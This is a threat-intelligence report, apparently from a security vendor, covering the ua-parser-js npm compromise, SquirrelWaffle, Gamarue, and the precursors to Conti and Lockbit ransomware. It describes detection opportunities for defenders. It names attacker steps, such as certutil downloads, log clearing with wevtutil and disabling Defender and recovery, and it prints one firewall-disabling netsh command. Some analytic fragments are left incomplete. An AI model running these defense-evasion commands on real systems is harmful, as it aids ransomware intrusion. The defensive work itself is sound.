⬆ = trending up from previous month
⬇= trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
NodeJS with a side of XMRig
Third-party developer libraries and packages are an inescapable part of modern development, and the compromise of one package can cascade and affect multiple subsequent packages that depend on a single one. While fallout from a compromise of a popular NPM package last month appears relatively limited, the incident was a stark reminder of how adversaries can exploit organizations’ reliance on trusted development tools. In fact, as we’re getting ready to publish this, we’re investigating a new potentially compromised package.
ua-parser-js, distributed an XMRig cryptominer to Windows and Linux systems, as well as an infostealer (likely DanaBot) to Windows systems. Though the package is downloaded nearly 8 million times each week and the impact could have been widespread, GitHub quickly issued an advisory warning users that updating that package, or anything that depended on it, would initiate malicious behavior on affected systems.
In this case, we detected the compromised version of
ua-parser-js with detectors designed to identify the cryptominer and infostealer it distributed. Detection opportunities for this category of threat inherently depend on which malware a poisoned package contains.
Detection opportunity: Certutil downloading a file
This detection opportunity will identify instances of Certificate Authority Utility (
certutil.exe) with command-line arguments to download an arbitrary file. This behavior is commonly observed across multiple threats and is one reliable way adversaries use to download tools on Windows.
When TR delivers SquirrelWaffle, ransomware precursors may soon follow…
In late October 2021, Red Canary observed an uptick in detections involving TR (a delivery affiliate) and SquirrelWaffle. In some cases where we detected TR delivering SquirrelWaffle, we observed additional payloads and domain reconnaissance beginning within minutes. The short dwell time, combined with recent external reporting that suggests new TR tradecraft can bypass certain email protections, highlights the need to detect and respond to these behaviors in near real time to avoid late-stage activity such as ransomware.
- Recent initial access tradecraft may allow adversaries to bypass certain protections provided by secure email gateways, increasing the odds that a malicious email is delivered to users’ inboxes. In early November, security researchers reported that TR used compromised, on-premises Exchange servers to send malicious emails to potential victims. As context, successful exploitation of Microsoft Exchange on-premises products enables system access, control of an enterprise email server, and access to enterprise email accounts. This access effectively allows an adversary to send and receive email from a victim’s account with the legitimacy of a trusted, internal sender.
- Decreased dwell time underscores the criticality of detecting and responding to ransomware precursor activity quickly. In one incident, operators executed Cobalt Strike and BloodHound—hallmark ransomware precursors—only 75 minutes after a user first opened the malicious XLS phishing lure that initiated SquirrelWaffle. Short dwell times necessitate a clear understanding of adversary behavior and a robust toolbox of detection analytics to identify this behavior.
Detection opportunity: Excel spawning Regsvr32
This detection opportunity will identify instances of
regsvr32.exe spawning as a child process of Microsoft Excel. This behavior is commonly observed in malicious documents with macros or Dynamic Data Exchange (DDE) execution, notably SquirrelWaffle XLS documents delivered by TR.
With a twinkle in its eyes, Gamarue makes the ascent
While most of us were reaching for our favorite pumpkin spice latte this past month, Gamarue’s spot in our rankings suggests that many others opted to reach for their thumb drives instead. Gamarue is a malware family used as part of a botnet. Some variants of Gamarue are worms and frequently spread via infected USB drives. Gamarue has also been used to spread other malware, steal information, and perform other activities such as click fraud. This malware was first seen more than 10 years ago and evolved into multiple variants before the operator was arrested in 2017.
Though Gamarue is no longer actively developed, it remains a pervasive threat. This highlights the notion that even if a threat is no longer active, it still warrants consideration from defenders tasked with responding to threats and building new detection logic.
Detection opportunity: Rundll32 Gamarue CLI
While we love to focus on detection opportunities that can identify multiple different threats by identifying uncommon types of behavior, this detection opportunity focuses on activity that is specific to multiple different Gamarue variants. Below you will find various examples that can be used to identify these variants executing.
In conjunction with this detection opportunity, you may be able to identify the name of an infected thumb drive that was plugged into the endpoint by looking for registry modifications to UserAssist registry keys containing the ROT13 encoded string
.yax at the same time. These registry values can be decoded to look something like
f:\usb drive (8gb).lnk, which may be indicative of a USB drive being the culprit.
Detection opportunity: Rundll32 spawning Explorer
This detection opportunity hinges on the likelihood of
explorer.exe. Red Canary often observes Gamarue spawning the
explorer.exe process in an unusual way.
Detection opportunity: Msiexec No CLI + External Netconn
As we mentioned in our 2021 Threat Detection Report, Gamarue can still be detected by identifying instances of the Windows Installer (
msiexec.exe) into which it has been injected. This type of activity can be identified by creating a detection analytic that focuses on instances of Msiexec that have no associated command-line options or an external network connection.
*Note: Double quotes (“”) within the command line means null.
New opportunities for detecting ransomware precursors
In October, we observed Conti and Lockbit affecting multiple customer environments. Fortunately, there are several opportunities to detect precursor behavior for these threats.
Conti precursor activity
In October, we observed several new Qbot TTPs in environments ultimately encrypted with Conti. Notably, we saw Qbot inject into Microsoft Synchronization Center (
mobsync.exe) and drop Conti DLLs. Additionally, we saw Qbot inject into Windows Error Reporting (
werfault.exe) with no command-line parameters. Following this, the adversary used the
xcopy utility to copy the malicious DLLs to different locations on the system. There are multiple opportunities to detect this activity in your environment:
Detection opportunity: Mobsync creating unusual DLL files
This detection analytic will identify an unusual file modification stemming from the
mobsync.exe process. We determined this file was Conti ransomware in one incident.
Detection opportunity: Werfault spawning with no command-line parameters
This detection analytic will identify unusual activity originating from the
werfault.exe process. Werfault typically spawns with command-line parameters when a process crashes, providing the program with input to create an error report.
Detection opportunity: Xcopy moving files from Group Policy Object (GPO) storage folder
Qbot created malicious files within the GPO storage folder during execution. Then, it used the Extended Copy Utility (
xcopy.exe) to copy malicious DLLs, including Conti. The following analytic will identify this activity:
31B2F340-016D-11D2-945F-00C04FB984F9 is the default domain policy GUID
Lockbit precursor activity
During a recent Lockbit infection, the operators used PsExec to launch a batch script, which initiated several commands designed to prepare the environment for encryption. The batch script displayed the following actions:
- set antivirus exclusion paths for
C:\Windows\ that allowed malicious binaries to exist in these paths without interference
- deleted the Windows Defender service
- disabled Windows Defender, User Account Control (UAC), and Windows Recovery
- turned off all firewall rules
- cleared multiple System and Security logs
The defense evasion and system recovery commands initiated by the script offer multiple detection opportunities.
Detection opportunity: Disabling Windows Recovery via bcedit
In combination with the other commands witnessed in the same timeframe, the use of the Boot Configuration editing tool (
bcdedit.exe) to set specific recovery options helped us identify malicious activity.
Parent_process == (
Detection opportunity: Wevtutil clearing System and Security logs
The Windows Event Log Utility Tool (
wevtutil.exe) process deleted both System and Security event logs. This behavior is atypical in most environments.
Detection opportunity: Netsh turning off all firewall rules
Setting all of the system firewall rules to a state of “off” should be considered suspicious and investigated further. While this may be a “normal” system administration function in some cases, it merits close review when observed with other activity associated with Lockbit.
advfirewall set allprofiles state off